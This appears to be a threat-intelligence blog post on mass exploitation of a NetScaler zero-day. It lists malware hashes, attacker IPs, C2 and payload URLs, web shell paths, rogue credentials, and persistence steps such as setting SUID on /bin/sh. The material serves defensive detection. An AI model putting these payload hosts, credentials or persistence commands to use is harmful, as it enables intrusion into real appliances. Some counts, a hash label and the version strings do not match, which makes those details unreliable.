While digging the communication files, 6 Shells were found which were communicating from 29th September to 5th October 2026.

MD5 HASH: FILE NAME: FILE SIZE
==============================
4b171153bf0a462c7eb4643ad6386af6 : puyxpiite.exe : 6.79 KB
e8ddc1169e813ab3cd6a3874a7411f49 : mjlkp0h.exe : 151 B
c6e5b2c2a4c174b22dc3a1f32a8cc7cd : 4risj.exe : 6.80 KB
034a721824243c02adf3afb0d7dfb05d : dc211.exe : 7.47 KB
86ba31f9dc599999725b4d87b045f92f : x.bin : 151 B
d19e73e09035b8c28202fffe0b367de7 : li29c.exe : 7.46 KB

As this 0-Day Exploitation started in September 2026, we got 3 samples (MD5 Hash) which is matching with the same timeline (as per VT):-

MD5 : INITIAL DATE : SIZE : USED IP
===================================
bb724df37959c23a4ce6b5c5c374217e : 29th Sept 2026 : 9.84 K -> 64.94.85.67
bd3f9986f3e09b84c5fcd18055cdc12e : 29th Sept 2026 : 551 B -> 45.141.21.130
08d0c6e815ac5fb188d4a775bb7f78c4 : 29th Sept 2026 : 249 B -> 62.133.62.80
521e589016a7769cfb904e4ed9673ad3 : 1st Oct 2026 : 975 B -> 130.94.20.222

The next anchor point was a post appeared in Reddit few days back which focuses on an IP Address of mass scanning.

213.209.159.55

Again, digging deep, I had found 33 Shell Scripts which is attributed to SlapShot Malware used in the Netscalar 0-Day Exploits, seen from 2nd October to 5th October, marking it a highly malicious artifact.

MD5 : FILE NAME: SIZE : FIRST SEEN
==================================
b048b13c80e231549c537887da0e5aa5 : anob4.exe : 27.81 KB -> 3rd Oct 2026
3f2214b27ca355e034add0d9f6692b32 : f1n1z.exe : 24.57 KB -> 2nd Oct 2026
e33b306b06c08f9d3d7223215f25b2cf : fajf2ar.exe : 25.75 KB -> 2nd Oct 2026
fc6370a116a027e97d6df2621fa371f2 : mf7ic.exe : 25.75 KB -> 3rd Oct 2026
27ac25984b50f6df6afc6997334b9505 : 274124a83e2174cc : 34.11 KB-> 3rd Oct 2026
a7fe433d8982d52cabb09c8b5c9386a9 : o4cypdj.exe : 24.57 KB -> 2nd Oct 2026
1c0f12288170e28d1beb30062c41ee6d : 125b42e2f03297d3: 34.11 KB -> 3rd Oct 2026
b5345968ad216e196f4ab8c1d2f458ce : ae7427 : 25.75 KB -> 3rd Oct 2026
84036e61c5d7ad0e4b76b582110901f3 : ayx6lq2ub.exe : 25.75 KB -> 3rd Oct 2026
0915e74a43b18bb7bca2cca226f2e118 : bfzb4en7d.exe : 24.57 KB -> 2nd Oct 2026
d81e80b7ed52d48575373e7aa7a7ac25 : 7vywivn.exe : 27.81 KB -> 3rd Oct 2026
ff2a8ebbcf069033cce505353e5d0118 : a718e4 : 28.97 KB -> 3rd Oct 2026
3f1e522d94f311936337892368acc6e8 : ay5vxehi.exe : 24.57 KB -> 2nd Oct 2026
ba4fb54383a9ed7c84624886ce0d352c : lnrbt2fw4.exe : 25.75 KB -> 3rd Oct 2026
59a926eeed450532a2f7c49412434409 : ol7ki10kv.exe : 25.75 KB -> 2nd Oct 2026
047cf08ab81daba675816d85013a3438 : l3obdyup.exe : 27.81 KB -> 3rd Oct 2026
8414c74e881b10a760c5c3eb797ec3c8 : aaikf.exe : 24.57 KB -> 2nd Oct 2026
df2f93ccc44711e299748af2bca30c8c : 9oq8oofk.exe : 25.75 KB -> 2nd Oct 2026
9d9df92216b8c2b6f13d324883febfe8 : 5e028d5f3daed211 : 34.11 KB -> 4th Oct 2026
5e8e6e69871896b6894a37865e7ee52e : ax2dpr1uw.exe : 27.80 KB -> 3rd Oct 2026
1c2b6c8d6310af7b2cf8a681b29f7ea4 : ae7427 : 34.08 KB -> 4th Oct 2026
976fdea475236b15a0622e6751c47089 : 04p3sazy.exe : 24.57 KB -> 2nd Oct 2026
979296a73a71092bb83ca07439d2e3aa : x8rsx.exe : 25.75 KB -> 2nd Oct 2026
12f273e40ec02a8509c340a4520a8703 : kq18zy3.exe : 24.57 KB -> 2nd Oct 2026
ab385592e22a38d32c3c732c08dcc5d3 : h8sfa3.exe : 24.57 KB -> 2nd Oct 2026

8 Files are of same size which is 25.75KB
6 Files are of same size which is 24.57KB

Following is a list of IPs associated with Netscalar 0-Day Exploit at various timelines (not included all the IPs):-

64.94.85.67: Associated with Pitboss Shell
62.133.62.80: Payload Delivery
31.56.197.72: Payload Delivery
23.27.143.20: Python reverse-shell retrieval; drops and runs /var/1.py
45.141.21.130: Call-back address for the customsnmpd reverse shell (443)

While checking the OSINT on these IPs, we can geo-locate to the following locations with different hosting providers.

This indicates the fact that, delivering a payload from different sources does not pinpoint to a single source as it is not a single attack or campaign however, many of the attackers uses their own servers/architectures to pull up the payloads from various sources.

As this was a mass-exploit ITW, we can understand the choice of attackers.

ATTACKERS ITW (IN THE WILD)

While analyzing the Exploit Trend in Greynoise, a pattern got emerged. 

Scanner Activity of CVE-2026–88771

September 29 has been recorded one of the highest scanning activity being performed for CVE-2026–88771.

NOTE: This is not the highest activity recorded, however the tag created on September 27 on the platform. So the prior scanning activity is not being listed here. 

While scanning for CVE-2026–88771 Exploit on various other scanner services, it is found that there are few IPs spotted to be exploiting the same at faster rate. Some of them are:-

103.62.49.154
37.19.221.171
66.42.100.63
154.217.251.226
176.65.148.54
81.94.239.8
100.24.104.167
54.152.53.242
52.0.15.140
15.204.172.7
94.183.174.99
151.240.53.133
82.167.14.7
46.151.182.18

NOTE: Complete List of IPs are provided in the IOC Section

HOW ATTACKERS TARGET POTENTIAL VICTIMS?

Just like Researchers and Threat Analysts, attackers also make use of scanner services like Shodan, Censys or Zoom Eyes to simply assess the unpatched/vulnerable services running. 

Shodan Result on Vulnerable Hosts

Hence, collecting malware samples from VT or Sandboxes would help them to pull up the attack chain, which can even lead to Ransomware Attacks at a higher spike. 

PATCH ASAP

The following versions are affected by both exploits (ATTOW):-

NetScaler ADC 14.114.1–12.x → 14.1–73.36
NetScaler Gateway 14.114.1–12.x → 14.1–73.36
NetScaler ADC 13.113.1–4.x → 13.1–64.22
NetScaler Gateway 13.113.1–4.x → 13.1–64.22
NetScaler ADC 14.1-FIPSAll 14.1-FIPS builds prior to 14.1–73.37 FIPS
NetScaler ADC 13.1-FIPSAll 13.1-FIPS builds prior to 13.1–37.279
NetScaler ADC 13.1-NDcPPAll 13.1-NDcPP builds prior to 13.1–37.279

In Short: Upgrade your Citrix NetScaler ADC and NetScaler Gateway appliances immediately to fixed builds 14.1–73.37, 13.1–64.23, or later FIPS/NDcPP equivalents to patch the actively exploited zero-day vulnerabilities, i.e.

  • Build 14.1–73.37, 13.1–64.23, and later
  • Fixed FIPS and NDcPP specific builds (14.1–73.37 FIPS, 13.1.37.279 or later)

CONCLUSION

This article can be treated as a Defenders Playbook to get the working style of various attackers found to be exploiting the same CVE. This sheds light on different methods adopted by attackers at different levels. As the attack is ongoing, there are many more artifacts which are not covered yet. 

IOCs


IP ADDRESSES EXPLOITING NETSCALAR
=================================
213.209.159.55
103.62.49.154
37.19.221.171
66.42.100.63
154.217.251.226
176.65.148.54
81.94.239.8
100.24.104.167
54.152.53.242
52.0.15.140
15.204.172.7
94.183.174.99
151.240.53.133
82.167.14.7
46.151.182.18
173.231.39.244
165.227.201.112
132.243.166.140
185.156.46.162
51.158.203.95
142.93.205.229
159.65.104.231
182.101.54.57
38.134.148.238
91.92.47.105
159.26.103.184
167.148.88.236
16.59.141.234
170.205.31.28
31.56.197.137
64.225.103.14
159.203.33.46
104.234.140.143
78.128.114.22
130.12.182.7
146.70.184.249
156.146.51.66
149.102.228.88
45.61.144.161
5.83.144.60
146.70.195.85
130.94.20.222
198.13.159.233
193.29.56.109
23.97.62.138
64.94.85.67
172.247.44.85
130.94.106.141
216.203.21.233
104.234.140.120
104.234.140.131
151.243.141.81
104.234.140.136
104.234.140.125
87.224.84.82
104.234.140.119
104.234.140.127
104.234.140.122
104.234.140.116
64.177.93.71
189.24.123.161
165.22.104.177
85.117.117.248
149.28.58.71
23.234.111.22
46.150.68.55
137.220.53.135
197.52.9.138
95.63.246.50
45.249.89.172
120.28.233.211
180.242.113.168
88.180.103.22
194.28.195.90
178.66.43.241
185.209.15.246
31.13.192.160
104.203.50.26
45.143.167.96
94.190.77.195
185.170.55.89
73.43.85.7
58.187.56.89
72.73.231.73
68.46.140.222
178.218.40.232
113.137.102.68
191.37.30.194
93.177.60.233
95.229.84.239
49.36.107.103
153.75.82.220
47.76.92.109
8.210.119.74
23.234.74.48
47.243.125.255
47.242.254.3
103.132.230.45
8.217.173.25
47.76.63.52
8.210.67.91
8.218.41.110
47.243.139.40
47.239.205.29
8.218.219.56
47.76.102.1
44.226.128.41
8.218.169.8
44.252.255.141
4.246.63.96
85.203.46.191
23.132.164.35
125.122.56.47
47.76.132.65
92.118.204.229
54.70.59.128
103.102.247.73
107.172.221.57
144.126.221.237
172.98.178.104
185.243.41.247
188.221.198.9
196.19.179.229
45.39.15.23
78.111.102.223
88.218.105.254
91.199.84.112
45.61.136.143
205.169.39.13
216.245.184.164
66.227.183.84
95.133.231.123
71.196.248.170
62.82.13.78
205.169.39.147
205.169.39.44
77.83.199.39
139.180.152.138
205.169.39.14
205.169.39.139
34.122.147.229
72.50.211.109
66.167.145.88
177.227.194.214
187.156.184.230
187.156.191.208
187.156.201.239
104.248.244.66
78.47.24.217
138.68.21.29
80.240.22.229
157.230.43.185
68.183.141.155
162.243.100.252
151.101.193.135
155.138.236.14
207.148.6.33
78.135.96.136
149.28.29.221
89.36.231.206
79.133.42.141
85.11.187.35
78.128.113.10
62.133.62.80
31.56.197.72
149.104.78.141

SLAPSHOT SAMPLES
================
 b048b13c80e231549c537887da0e5aa5 :  anob4.exe      :  27.81 KB 
 3f2214b27ca355e034add0d9f6692b32 :  f1n1z.exe      :  24.57 KB 
 e33b306b06c08f9d3d7223215f25b2cf :  fajf2ar.exe    :  25.75 KB 
 fc6370a116a027e97d6df2621fa371f2 :  mf7ic.exe      :  25.75 KB  
 27ac25984b50f6df6afc6997334b9505 :  274124a83e2174cc :  34.11 KB 
 a7fe433d8982d52cabb09c8b5c9386a9 :  o4cypdj.exe    :  24.57 KB 
 1c0f12288170e28d1beb30062c41ee6d :  125b42e2f03297d3:  34.11 KB  
 b5345968ad216e196f4ab8c1d2f458ce :  ae7427         :  25.75 KB 
 84036e61c5d7ad0e4b76b582110901f3 :  ayx6lq2ub.exe  :  25.75 KB 
 0915e74a43b18bb7bca2cca226f2e118 :  bfzb4en7d.exe  :  24.57 KB 
 d81e80b7ed52d48575373e7aa7a7ac25 :  7vywivn.exe    :  27.81 KB 
 ff2a8ebbcf069033cce505353e5d0118 :  a718e4         :  28.97 KB 
 3f1e522d94f311936337892368acc6e8 :  ay5vxehi.exe   :  24.57 KB 
 ba4fb54383a9ed7c84624886ce0d352c :  lnrbt2fw4.exe  :  25.75 KB 
 59a926eeed450532a2f7c49412434409 :  ol7ki10kv.exe  :  25.75 KB 
 047cf08ab81daba675816d85013a3438 :  l3obdyup.exe   :  27.81 KB 
 8414c74e881b10a760c5c3eb797ec3c8 :  aaikf.exe      :  24.57 KB 
 df2f93ccc44711e299748af2bca30c8c :  9oq8oofk.exe   :  25.75 KB 
 9d9df92216b8c2b6f13d324883febfe8 :  5e028d5f3daed211 :  34.11 KB
 5e8e6e69871896b6894a37865e7ee52e :  ax2dpr1uw.exe  :  27.80 KB 
 1c2b6c8d6310af7b2cf8a681b29f7ea4 :  ae7427         :  34.08 KB 
 976fdea475236b15a0622e6751c47089 :  04p3sazy.exe   :  24.57 KB 
 979296a73a71092bb83ca07439d2e3aa :  x8rsx.exe      :  25.75 KB 

URL
http://213.209.159.55:443/t/a779ab
http://213.209.159.55:443/t/ae7427
http://213.209.159.55:443/t/a718e4
http://213.209.159.55:443/t/861cd3
http://213.209.159.55:443/t/1f0a10
http://213.209.159.55:443/t/818f74
http://213.209.159.55:443/t/906b4f
http://213.209.159.55:443/t/db6c6c
http://213.209.159.55:443/t/324d58
http://213.209.159.55:443/t/29a04f
http://213.209.159.55:443/t/bad2ad
http://213.209.159.55:443/t/6f3c3e
http://213.209.159.55:443/t/274124
http://213.209.159.55:443/t/9c3166

http://213.209.159.55:443/t/3b6d2f.sh
http://213.209.159.55:443/t/62cd78.sh
http://213.209.159.55:443/t/471d83.sh

http://213.209.159.55:80/t/274124a83e2174cc
http://213.209.159.55:80/t/125b42e2f03297d3
http://213.209.159.55:443/t/5e028d5f3daed211
http://130.94.20.222:8888/c/b3a54bea3bfaa

https://entretiensol.com:443/api/v1/install/dl_d3giforcdfgc5hqurluy.ctzlc5tkt3w6p5flcmnq?download_tl
https://entretiensol.com:443/api/v1/install/dl_3wrbowpypfk26nypk6fj.erlcdi3xomfglunnik66?download_tls=insecure
https://entretiensol.com/v1/artifacts/$OS/$ARCH/latest

IP
213.209.159.55: Main C2 / Exfil host for SLAPSHOT samples
64.94.85.67: Exfil host used in the sec_monitor Perl script, Pitboss Shell
62.133.62.80: Payload Delivery
31.56.197.72: Payload Delivery
23.27.143.20: Python reverse-shell retrieval; drops and runs /var/1.py 
45.141.21.130: Call-back address for the customsnmpd reverse shell (443)

Domain: entretiensol.com

URL Paths (SLAPSHOT)
====================
/t/ae7427
/t/a718e4
/t/861cd3
/t/1f0a10
/t/818f74
/t/274124a83e2174cc

Full C2 URLs
============
http://213.209.159.55:443/t/
http://213.209.159.55:80/t/274124a83e2174cc
Both port 443 and 80 observed

FILE AND PATH
=============
/nsconfig/.slap/: SLAPSHOT install directory
/var/tmp/.ux/: Secondary SLAPSHOT directory
/var/tmp/.ux/slapshot.py: Python session manager
/nsconfig/.slap/agent.pl: Perl TCP multiplexer
/nsconfig/.slap/bridge.pl: Perl bridge script
/tmp/.uxdlock: SLAPSHOT lock file
/tmp/.uxdport: SLAPSHOT port file
/var/netscaler/logon/LogonPoint/custom/.slap.receiver: Web shell receiver
/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver: Web shell receiver
/var/netscaler/logon/LogonPoint/custom/receiver.deb: Disguised web shell
/var/netscaler/logon/LogonPoint/.local_journal: Password-protected PHP web shell
/var/tmp/.ns_data: Platypus data directory
/var/tmp/.ns_09343.pl: Platypus agent binary (example name)
/var/core/.ns-cache/: Alternative Platypus working directory
/etc/httpd.conf.slap.bak: Backup of modified httpd.conf
https://entretiensol.com/v1/artifacts/$OS/$ARCH/latest: Platypus Agent Download Path

CREDENTIALS & TOKENS
====================
SLAPSHOT Auth Token: 072874c28950cf7befd319d17e9709e7
Rogue Username: sec_monitor
Rogue Password: ay#39&RGYvv4Xuzy
Web Shell Password: QI@UEG5PC7oRt31E
Web Shell SHA-256: e4d909c290d0fb1ca068ffaddf22cbd0
Platypus Token: plt_2uhfcg6a7npuwiuaiakb.w6rgc3kclkuwh7nhgr2h

BEHAVORIAL/CONFIG INDICATORS
============================
SUID on shell: chmod 6555 /bin/sh (or 06555)
httpd.conf modifications: Added SetHandler application/x-httpd-php for non-standard extensions (.deb, .sig, .ico, .local_journal)
Alias / AliasMatch: Fake CSS paths pointing to web shells (e.g. LogonUISimple.html.style.min.css)
Rogue superuser: sec_monitor bound with superuser privileges in ns.conf
Exfil filename: update_result_3567cs.tgz

Leave a Reply

Discover more from THE RAVEN FILE

Subscribe now to keep reading and get access to the full archive.

Continue reading